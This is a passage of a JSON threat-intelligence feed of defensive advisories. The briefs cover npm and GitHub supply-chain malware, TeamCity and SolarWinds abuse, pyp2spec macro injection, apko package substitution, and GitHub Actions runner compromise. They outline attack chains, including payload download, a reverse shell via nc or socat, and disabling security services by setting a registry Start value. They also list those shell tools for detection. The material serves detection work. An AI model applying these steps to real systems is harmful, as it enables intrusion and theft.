rules).\u003c/li\u003e\n\u003cli\u003eEnable process monitoring for any processes spawned during or after npm package installations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-16T04:45:53Z","date_published":"2026-03-16T04:45:53Z","id":"/briefs/2024-01-pylangghost-npm/","summary":"A new remote access trojan (RAT) named PylangGhost has been observed on the npm registry, posing a supply chain risk to developers and applications using affected packages.","title":"PylangGhost RAT Observed on npm Registry","url":"https://feed.craftedsignal.io/briefs/2024-01-pylangghost-npm/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["supply-chain","unicode","malware","github"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe Glassworm malware is a newly discovered threat that leverages the presence of invisible Unicode characters within source code to inject malicious payloads into software projects.  Discovered in early 2026, this malware has already compromised over 150 repositories on GitHub. The attack focuses on injecting these invisible characters into popular repositories, particularly those related to JavaScript and Node.js development, potentially impacting a wide range of applications and services. The delivery mechanism involves contributors with malicious intent adding these characters or compromised accounts injecting them. This sophisticated approach allows the malware to remain undetected during code reviews and traditional security scans, making it a significant threat to the software supply chain.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA malicious actor gains commit access to a target GitHub repository through either direct contribution or compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe actor injects invisible Unicode characters into source code files, such as JavaScript or package.json files.\u003c/li\u003e\n\u003cli\u003eThese Unicode characters are strategically placed within the code to be innocuous visually but alter the program\u0026rsquo;s execution when interpreted.\u003c/li\u003e\n\u003cli\u003eThe altered code, containing the Unicode characters, is committed to the repository, potentially passing initial code review checks due to the characters\u0026rsquo; invisibility.\u003c/li\u003e\n\u003cli\u003eWhen a developer clones or downloads the compromised repository, the Unicode characters are included in their local copy of the code.\u003c/li\u003e\n\u003cli\u003eDuring the build process (e.g., \u003ccode\u003enpm install\u003c/code\u003e), the malicious code embedded within the Unicode characters is executed.\u003c/li\u003e\n\u003cli\u003eThis execution leads to the download and execution of a secondary payload from a remote server, potentially installing malware, backdoors, or exfiltrating sensitive data.\u003c/li\u003e\n\u003cli\u003eThe final objective is to compromise the developer\u0026rsquo;s system or to inject malicious code into applications built using the compromised repository, thus propagating the malware further.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful deployment of Glassworm can lead to widespread supply chain compromise, potentially affecting thousands of developers and end-users.  Over 150 GitHub repositories have already been identified as infected, and the actual number could be much higher. Successful exploitation leads to arbitrary code execution on developer machines and within deployed applications. The compromised code can steal credentials, inject backdoors, and exfiltrate sensitive data, leading to significant financial and reputational damage. The lack of visibility makes remediation challenging.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement static analysis tools capable of detecting invisible Unicode characters in source code repositories (reference: Overview).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided below to identify suspicious process executions originating from build processes that may indicate Glassworm activity.\u003c/li\u003e\n\u003cli\u003eEducate developers about the risks associated with invisible Unicode characters and the importance of careful code review (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication on all developer accounts to prevent account compromise (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for connections to suspicious or unknown domains originating from build processes (reference: Attack Chain).\u003c/li\u003e\n\u003cli\u003eUtilize file integrity monitoring (FIM) to track changes to critical files within repositories and development environments (reference: Attack Chain).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-03-15T15:30:24Z","date_published":"2026-03-15T15:30:24Z","id":"/briefs/2024-02-29-glassworm-unicode-malware/","summary":"The Glassworm malware utilizes invisible unicode characters to infect over 150 GitHub repositories, posing a supply chain risk to developers and users.","title":"Glassworm Malware Hidden in Unicode Characters Affecting GitHub Repositories","url":"https://feed.craftedsignal.io/briefs/2024-02-29-glassworm-unicode-malware/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2023-42793"}],"_cs_exploited":false,"_cs_products":["TeamCity"],"_cs_severities":["medium"],"_cs_tags":["teamcity","supply-chain","initial-access"],"_cs_type":"advisory","_cs_vendors":["JetBrains"],"content_html":"\u003cp\u003eJetBrains TeamCity is a continuous integration and deployment server, making it a high-value target for attackers. Exploitation of TeamCity vulnerabilities can lead to remote code execution, enabling adversaries to compromise the software development pipeline. This activity is detected by monitoring for suspicious child processes initiated by the TeamCity Java executable, focusing on executables like \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, and \u003ccode\u003emsiexec.exe\u003c/code\u003e. The detection logic excludes legitimate operations to reduce false positives. This activity can lead to complete compromise of the build environment, allowing attackers to inject malicious code into software builds.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e An attacker exploits a vulnerability (e.g., CVE-2023-42793) in the TeamCity server to gain initial access.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCode Execution:\u003c/strong\u003e The attacker leverages the vulnerability to execute arbitrary code on the TeamCity server.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eProcess Spawning:\u003c/strong\u003e The attacker spawns a command interpreter, such as \u003ccode\u003ecmd.exe\u003c/code\u003e or \u003ccode\u003epowershell.exe\u003c/code\u003e, from the TeamCity Java process (\u003ccode\u003ejava.exe\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDiscovery:\u003c/strong\u003e The attacker uses discovery commands via the spawned shell to enumerate users, network configuration, and running processes using tools like \u003ccode\u003ewhoami.exe\u003c/code\u003e, \u003ccode\u003eipconfig.exe\u003c/code\u003e, and \u003ccode\u003etasklist.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDefense Evasion:\u003c/strong\u003e The attacker leverages system binary proxy execution using tools like \u003ccode\u003emshta.exe\u003c/code\u003e or \u003ccode\u003eregsvr32.exe\u003c/code\u003e to evade detection.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence:\u003c/strong\u003e While not explicitly mentioned, the attacker could establish persistence by creating scheduled tasks or modifying registry keys via spawned processes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The attacker uses discovered credentials to move laterally to other systems within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e The attacker injects malicious code into software builds, compromises sensitive data, or deploys ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of JetBrains TeamCity can lead to a full compromise of the software development lifecycle, resulting in supply chain attacks. Attackers can inject malicious code into software builds, leading to widespread distribution of compromised software. While specific victim counts are unavailable, this type of attack has the potential to affect numerous organizations relying on the compromised software. The Trend Micro research indicates that TeamCity vulnerability exploits can lead to Jasmin ransomware deployment.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the \u0026ldquo;Suspicious JetBrains TeamCity Child Process\u0026rdquo; rule to your SIEM to detect potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging to capture process execution events, which are essential for triggering the detection rule.\u003c/li\u003e\n\u003cli\u003eReview and patch any known vulnerabilities in JetBrains TeamCity, focusing on remote code execution flaws as described in the referenced Trend Micro report.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the impact of a compromised TeamCity server and prevent lateral movement.\u003c/li\u003e\n\u003cli\u003eContinuously monitor TeamCity server logs for any unusual activity or unauthorized access attempts.\u003c/li\u003e\n\u003cli\u003eTune the \u0026ldquo;Suspicious JetBrains TeamCity Child Process\u0026rdquo; rule by creating exceptions for legitimate build scripts that invoke command-line utilities to reduce false positives, as mentioned in the rule\u0026rsquo;s documentation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-05-15T12:00:00Z","date_published":"2024-05-15T12:00:00Z","id":"/briefs/2024-05-jetbrains-teamcity-suspicious-child-process/","summary":"Detection of suspicious processes spawned by JetBrains TeamCity indicates potential exploitation of remote code execution vulnerabilities, with attackers using command interpreters and system binaries for malicious purposes.","title":"Suspicious Child Processes Spawned by JetBrains TeamCity","url":"https://feed.craftedsignal.io/briefs/2024-05-jetbrains-teamcity-suspicious-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["GitHub Actions"],"_cs_severities":["low"],"_cs_tags":["github","self-hosted-runner","audit-log","devops","supply-chain"],"_cs_type":"advisory","_cs_vendors":["GitHub"],"content_html":"\u003cp\u003eThis threat brief focuses on detecting changes to self-hosted runner configurations within GitHub environments. Self-hosted runners are systems deployed and managed by users to execute jobs from GitHub Actions, providing flexibility and control over the execution environment. Monitoring these runners is crucial because unauthorized modifications can lead to various malicious activities, including data collection, persistence, privilege escalation, or even initial access. The rule provided detects such changes based on audit logs, requiring administrators to validate the changes through the GitHub UI for complete context. Detecting these modifications early can help prevent or mitigate potential security breaches.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to a GitHub organization or repository with permissions to manage self-hosted runners. This could be achieved through compromised credentials (T1078.004) or exploiting a vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies the configuration of an existing self-hosted runner group or creates a new runner group (org.runner_group_created).\u003c/li\u003e\n\u003cli\u003eThe attacker adds or removes runners from a runner group (org.runner_group_runners_added, org.runner_group_runner_removed, org.runner_group_updated).\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker registers a new self-hosted runner within the environment (repo.register_self_hosted_runner).\u003c/li\u003e\n\u003cli\u003eThe attacker removes an existing self-hosted runner from the environment (repo.remove_self_hosted_runner, org.remove_self_hosted_runner).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised runner or runner group to execute malicious code within the GitHub Actions workflow, potentially collecting sensitive data or escalating privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the compromised runner to establish persistence within the GitHub environment, ensuring continued access.\u003c/li\u003e\n\u003cli\u003eThe attacker exploits the compromised runner to gain initial access to other systems or networks connected to the GitHub environment.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised self-hosted runners can lead to a range of impacts, including data exfiltration, code injection, and privilege escalation within the targeted GitHub environment. Successful attacks could result in unauthorized access to sensitive repositories, modification of code, or deployment of malicious software. The impact can vary depending on the scope of the compromised runner and the permissions associated with it. The effects could extend beyond the GitHub environment if the compromised runner has access to other systems or networks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable the audit log streaming feature in GitHub to capture events related to self-hosted runner modifications, as required by the logsource definition.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Github Self Hosted Runner Changes Detected\u0026rdquo; to your SIEM and tune for your specific environment to detect suspicious configuration changes.\u003c/li\u003e\n\u003cli\u003eRegularly review the audit logs in the GitHub UI to validate any detected changes to self-hosted runners and runner groups to ensure legitimate modifications.\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies for managing self-hosted runners, limiting permissions to only authorized personnel.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T14:30:00Z","date_published":"2024-01-03T14:30:00Z","id":"/briefs/2024-01-github-runner-changes/","summary":"Detection of changes to self-hosted runner configurations in GitHub environments can indicate potential impact, discovery, collection, persistence, privilege escalation, initial access, or stealth activities.","title":"GitHub Self-Hosted Runner Configuration Changes Detected","url":"https://feed.craftedsignal.io/briefs/2024-01-github-runner-changes/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SolarWinds.BusinessLayerHost.exe","SolarWinds.BusinessLayerHostx64.exe","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["supply-chain","execution","solarwinds"],"_cs_type":"advisory","_cs_vendors":["Elastic","SolarWinds","SentinelOne"],"content_html":"\u003cp\u003eThis detection rule identifies suspicious child processes initiated by SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe, excluding known legitimate operations. Adversaries may exploit the trusted SolarWinds processes to execute unauthorized programs with elevated privileges, bypassing security controls. The rule focuses on Windows systems and is designed to detect activity indicative of post-compromise actions following a supply chain attack. This detection is crucial for organizations that utilize SolarWinds software, as malicious actors could leverage compromised SolarWinds installations to gain unauthorized access and execute arbitrary code within the network.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial compromise of the SolarWinds software supply chain (T1195.002).\u003c/li\u003e\n\u003cli\u003eMalicious code is injected into SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eThe compromised SolarWinds process spawns a suspicious child process.\u003c/li\u003e\n\u003cli\u003eThe child process executes a malicious command or binary, attempting to evade detection.\u003c/li\u003e\n\u003cli\u003eThe child process leverages Native APIs (T1106) to perform privileged actions.\u003c/li\u003e\n\u003cli\u003eLateral movement or data exfiltration may occur from the compromised host.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the execution of arbitrary code on systems running SolarWinds software. This can result in data theft, system compromise, and further propagation of the attack throughout the network. Organizations in various sectors utilizing SolarWinds products are potentially at risk. The impact may include loss of sensitive data, disruption of critical services, and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious SolarWinds Child Process - CommandLine\u003c/code\u003e to detect potentially malicious child processes of SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSuspicious SolarWinds Child Process - Executable\u003c/code\u003e to detect execution of unusual executables as child processes of SolarWinds.BusinessLayerHost.exe or SolarWinds.BusinessLayerHostx64.exe.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command line details on Windows systems to ensure the Sigma rules have sufficient data.\u003c/li\u003e\n\u003cli\u003eReview and tune the rules for false positives based on legitimate SolarWinds child processes in your environment, updating the exclusion lists in the rules accordingly, referencing the \u0026ldquo;false_positives\u0026rdquo; section in the rule description.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-solarwinds-child-process/","summary":"Detection of unusual child processes spawned by SolarWinds processes may indicate malicious program execution, potentially bypassing security controls.","title":"Suspicious SolarWinds Child Process Execution","url":"https://feed.craftedsignal.io/briefs/2024-01-solarwinds-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["solarwinds","defense-evasion","registry-modification","supply-chain"],"_cs_type":"advisory","_cs_vendors":["SolarWinds","Microsoft","SentinelOne","Crowdstrike","Elastic"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of SolarWinds processes attempting to disable services by modifying their registry start type. This activity is associated with defense evasion tactics, potentially linked to initial access via supply chain compromise, similar to the SUNBURST campaign. The behavior involves SolarWinds binaries, such as \u003ccode\u003eSolarWinds.BusinessLayerHost*.exe\u003c/code\u003e and \u003ccode\u003eNetFlowService*.exe\u003c/code\u003e, manipulating registry entries related to service start configurations. This technique can be used to impair or disable security tools and services, allowing attackers to operate more freely within a compromised environment.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial compromise of the SolarWinds Orion platform, potentially through a supply chain attack.\u003c/li\u003e\n\u003cli\u003eDeployment of a malicious module or payload within the SolarWinds environment.\u003c/li\u003e\n\u003cli\u003eExecution of a SolarWinds process, such as \u003ccode\u003eSolarWinds.BusinessLayerHost*.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe SolarWinds process modifies the registry to change the start type of a service.\u003c/li\u003e\n\u003cli\u003eThe registry modification targets the \u003ccode\u003eHKLM\\SYSTEM\\ControlSet*\\Services\\*\\Start\u003c/code\u003e path.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eStart\u003c/code\u003e value is set to \u0026ldquo;4\u0026rdquo; or \u0026ldquo;0x00000004\u0026rdquo;, which disables the targeted service.\u003c/li\u003e\n\u003cli\u003eDisabling critical security services allows the attacker to evade detection and further compromise the system.\u003c/li\u003e\n\u003cli\u003eAttacker achieves persistence and performs lateral movement, exfiltrating data or deploying ransomware.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the disabling of critical security services, such as antivirus, endpoint detection and response (EDR) agents, or other monitoring tools. This can significantly reduce the visibility of malicious activity within the network, potentially leading to data breaches, ransomware deployment, or other severe security incidents. The SolarWinds supply chain compromise affected numerous organizations globally, underscoring the potential impact of this type of attack.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eSolarWinds Process Disabling Services via Registry\u003c/code\u003e to your SIEM to detect registry modifications by SolarWinds processes aimed at disabling services.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon registry event logging to provide the necessary data for the Sigma rule to function effectively.\u003c/li\u003e\n\u003cli\u003eReview and harden access controls for SolarWinds processes to restrict their ability to modify critical system settings.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the affected service and the timeline of events surrounding the registry modification.\u003c/li\u003e\n\u003cli\u003eUtilize threat intelligence platforms to stay informed about known SolarWinds-related attack patterns and indicators of compromise (IOCs).\u003c/li\u003e\n\u003cli\u003eMonitor endpoints for unusual behavior by SolarWinds processes, including network connections, file modifications, and process creations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-solarwinds-service-disable/","summary":"A SolarWinds binary is modifying the start type of a service to be disabled via registry modification, potentially to disable or impair security services.","title":"SolarWinds Process Disabling Services via Registry Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-solarwinds-service-disable/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["pyp2spec (\u003c 0.14.1)"],"_cs_severities":["high"],"_cs_tags":["code-injection","supply-chain","rpm","linux"],"_cs_type":"advisory","_cs_vendors":["pip","Fedora"],"content_html":"\u003cp\u003epyp2spec, a tool for generating RPM spec files from PyPI packages, contains a code injection vulnerability affecting versions prior to 0.14.1. The vulnerability stems from the tool\u0026rsquo;s failure to properly escape RPM macro directives when writing PyPI package metadata (such as the summary field) into the generated spec file. This allows a malicious PyPI package to inject arbitrary commands into the spec file, which are then executed when an RPM tool processes the file. This poses a significant risk to package maintainers and build systems, particularly within the Fedora ecosystem where compromised credentials can lead to widespread supply chain attacks. The realistic attack vector involves typosquatting or targeting packages known to be under review.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious PyPI package containing specially formatted metadata, including an RPM macro directive (e.g., within the package summary).\u003c/li\u003e\n\u003cli\u003eA Fedora packager, intending to package a legitimate Python package, uses \u003ccode\u003epyp2spec\u003c/code\u003e to generate an RPM spec file from the malicious PyPI package.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epyp2spec\u003c/code\u003e writes the attacker-controlled metadata, including the unescaped RPM macro directive, into the generated spec file.\u003c/li\u003e\n\u003cli\u003eThe packager, or an automated system, uses an RPM tool like \u003ccode\u003erpmbuild -bs\u003c/code\u003e, \u003ccode\u003erpmbuild --nobuild\u003c/code\u003e, or \u003ccode\u003erpm -q --specfile\u003c/code\u003e to inspect or build the package from the spec file.\u003c/li\u003e\n\u003cli\u003eThe RPM tool parses the spec file and, upon encountering the RPM macro directive, executes the embedded command.\u003c/li\u003e\n\u003cli\u003eThe attacker\u0026rsquo;s command executes on the build machine, potentially granting the attacker access to the packager\u0026rsquo;s credentials (dist-git SSH keys, Koji build credentials, Bodhi update credentials).\u003c/li\u003e\n\u003cli\u003eThe attacker uses the compromised credentials to commit malicious source code to the distribution\u0026rsquo;s Git repository (dist-git).\u003c/li\u003e\n\u003cli\u003eThe malicious code is built and distributed to end users through the normal package update pipeline, resulting in a supply chain attack.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to execute arbitrary commands on the build machine. This can lead to the compromise of sensitive credentials, such as SSH keys and build system credentials. In the Fedora ecosystem, this could enable an attacker to inject malicious code into packages that are distributed to end users, potentially affecting millions of systems. The vulnerability poses a high risk to package maintainers and build systems.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to \u003ccode\u003epyp2spec\u003c/code\u003e version 0.14.1 or later to remediate the code injection vulnerability as described in the advisory (\u003ca href=\"https://github.com/advisories/GHSA-r35x-v8p8-xvhw)\"\u003ehttps://github.com/advisories/GHSA-r35x-v8p8-xvhw)\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eImplement file integrity monitoring on RPM spec files, alerting on unexpected modifications, to detect potentially malicious injected code. Use file_event logs with a rule like the one below.\u003c/li\u003e\n\u003cli\u003eMonitor process executions originating from RPM tools (\u003ccode\u003erpmbuild\u003c/code\u003e, \u003ccode\u003erpm\u003c/code\u003e), focusing on unusual or unexpected commands that could indicate exploitation, using process_creation logs and the Sigma rule provided.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-pyp2spec-code-injection/","summary":"pyp2spec before 0.14.1 is vulnerable to code injection by writing PyPI package metadata into generated spec files without escaping RPM macro directives, allowing malicious packages to execute arbitrary commands on the build machine.","title":"pyp2spec Code Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-pyp2spec-code-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["apko","go/chainguard.dev/apko"],"_cs_severities":["high"],"_cs_tags":["package-substitution","supply-chain","linux"],"_cs_type":"advisory","_cs_vendors":["Chainguard"],"content_html":"\u003cp\u003eApko, a tool for building container images, is susceptible to a critical package substitution vulnerability in versions prior to 1.2.7. The vulnerability stems from the tool\u0026rsquo;s failure to validate downloaded \u003ccode\u003e.apk\u003c/code\u003e packages against the checksums recorded in the signed \u003ccode\u003eAPKINDEX.tar.gz\u003c/code\u003e file. While Apko does verify the signature on the index and parses the checksums, it does not compare these checksums against the downloaded packages during the \u003ccode\u003egetPackageImpl()\u003c/code\u003e function. This oversight can allow an attacker with the ability to manipulate download responses, such as through compromised mirrors, HTTP repositories, or poisoned CDN caches, to inject malicious or unintended packages into the built container images. This issue was reported by Oleh Konko from 1seal.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises a mirror, HTTP repository, or poisons a CDN cache used by apko.\u003c/li\u003e\n\u003cli\u003eA user initiates an apko build process, specifying a package to be included in the image.\u003c/li\u003e\n\u003cli\u003eApko requests the specified package from the compromised source.\u003c/li\u003e\n\u003cli\u003eThe attacker substitutes the legitimate package with a malicious or altered \u003ccode\u003e.apk\u003c/code\u003e package.\u003c/li\u003e\n\u003cli\u003eApko downloads the substituted package.\u003c/li\u003e\n\u003cli\u003eApko verifies the signature on \u003ccode\u003eAPKINDEX.tar.gz\u003c/code\u003e but fails to validate the downloaded \u003ccode\u003e.apk\u003c/code\u003e package against the checksum in the index.\u003c/li\u003e\n\u003cli\u003eApko installs the malicious or altered package into the container image.\u003c/li\u003e\n\u003cli\u003eThe resulting container image is built with the compromised package, potentially leading to arbitrary code execution or other malicious activity when the image is deployed.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to inject arbitrary packages into container images built with vulnerable versions of apko. This can lead to a variety of adverse outcomes, including arbitrary code execution within containers, data exfiltration, and denial-of-service attacks. The lack of package validation provides a significant opportunity for attackers to compromise the integrity of containerized applications and infrastructure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to apko version 1.2.7 or later once a fix is available from the vendor.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unexpected connections to untrusted or unusual package repositories using network connection logs and create rules to alert on such activity.\u003c/li\u003e\n\u003cli\u003eImplement integrity monitoring on the build system to detect unauthorized modification of files, specifically focusing on downloaded packages. This can be achieved through file integrity monitoring tools that generate file_event logs.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect suspicious process executions within containers shortly after the build process.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-apko-package-substitution/","summary":"Apko versions prior to 1.2.7 are vulnerable to package substitution due to not verifying downloaded apk packages against the APKINDEX checksum, potentially allowing an attacker who can substitute download responses to install arbitrary packages into built images.","title":"Apko Package Substitution Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-apko-package-substitution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["medium"],"_cs_tags":["github-actions","supply-chain","execution","devops"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat focuses on the exploitation of GitHub Actions runners by malicious actors. By gaining the ability to modify or trigger workflows in a linked GitHub repository, attackers can execute arbitrary commands on the runner host. The attack leverages the \u003ccode\u003eRunner.Worker\u003c/code\u003e process or shell interpreters launched via runner entrypoint scripts. Successful exploitation can lead to malicious workflow activity, including code execution, reconnaissance, credential harvesting, and network exfiltration. This presents a significant risk, particularly for organizations relying on self-hosted runners, as it allows attackers to potentially compromise the underlying infrastructure and sensitive data. The Elastic detection rule aims to identify such malicious activity.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains unauthorized access to a GitHub repository linked to a self-hosted runner.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies an existing workflow or creates a new one to inject malicious commands.\u003c/li\u003e\n\u003cli\u003eThe compromised workflow is triggered, initiating the \u003ccode\u003eRunner.Worker\u003c/code\u003e process on the runner host.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eRunner.Worker\u003c/code\u003e process executes a shell interpreter (e.g., bash, sh, zsh) via an entrypoint script.\u003c/li\u003e\n\u003cli\u003eThe shell interpreter executes malicious commands specified in the compromised workflow, such as downloading a payload using \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed, establishing a reverse shell connection to an attacker-controlled server using \u003ccode\u003enc\u003c/code\u003e or \u003ccode\u003esocat\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance, credential harvesting, or lateral movement within the runner host and connected network.\u003c/li\u003e\n\u003cli\u003eSensitive data is exfiltrated from the compromised runner host to the attacker\u0026rsquo;s infrastructure.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the complete compromise of the self-hosted runner environment. This could result in the theft of sensitive source code, credentials, and other proprietary information. The attack can also be used as a stepping stone for further attacks on the organization\u0026rsquo;s internal network and infrastructure. Affected sectors include software development, DevOps, and any organization using GitHub Actions with self-hosted runners.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eExecution via GitHub Actions Runner\u003c/code\u003e to your SIEM to detect suspicious commands executed by the GitHub Actions Runner.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for commands like \u003ccode\u003ecurl\u003c/code\u003e, \u003ccode\u003ewget\u003c/code\u003e, \u003ccode\u003enc\u003c/code\u003e, \u003ccode\u003esocat\u003c/code\u003e, \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003ebash\u003c/code\u003e, and \u003ccode\u003essh\u003c/code\u003e spawned by \u003ccode\u003eRunner.Worker\u003c/code\u003e or shell interpreters with \u003ccode\u003eentrypoint.sh\u003c/code\u003e in their command line (see Sigma rule).\u003c/li\u003e\n\u003cli\u003eImplement strict access control policies for GitHub repositories and workflows to prevent unauthorized 